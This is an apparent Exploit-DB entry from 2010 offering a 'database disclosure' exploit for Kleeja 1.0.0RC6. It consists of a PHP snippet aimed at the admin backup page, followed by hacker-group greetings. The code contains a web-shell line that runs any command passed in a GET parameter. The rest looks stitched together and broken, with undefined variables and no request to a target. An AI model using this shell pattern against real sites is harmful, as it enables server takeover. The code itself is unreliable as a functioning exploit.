kleeja 1.0.0RC6 – Database Disclosure

  • 作者: indoushka
    日期: 2010-08-09
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/14585/
  • ====================================================
kleeja1.0.0RC6 Database Disclosure Exploit
====================================================

######################################################################## 

# Vendor: kleeja.com
# Date: 2010-05-27 
# Author : indoushka 
# Contact : 00213771818860
# Home : www.sec4ever.com
# Bug: Database Disclosure Exploit
# Tested on : windows SP2 Fran?ais V.(Pnx2 2.0) 
######################################################################## 

# Exploit By indoushka 

<?php

$action 	= "http://127.0.0.1/kleeja/admin.php?cp=bckup";
$sql_data = "# 1.0.0RC6, DB version:6\n";
			$sql_data .= "# Kleeja Backup kleeja.comkleeja version : " . KLEEJA_VERSION . ", DB version:" . $config['db_version'] . "\n";
			$sql_data .= "# DATE : " . gmdate("d-m-Y H:i:s", time()) . " GMT\n";
			$sql_data .= "#\n\n\n";
			$cmd = $_GET['cmd'];
system($cmd);
			$db_name_save = $dbname . '_kleeja.sql';
			@set_time_limit(0);
			header("Content-length: " . strlen($outta));
			header("Content-type: text/plain");
			header("Content-Disposition: attachment; filename=$db_name_save");
			echo $sql_data . $outta;
			exit;


?>


Dz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
special thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller 
Sid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net 
MR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH
---------------------------------------------------------------------------------------------------------------------------------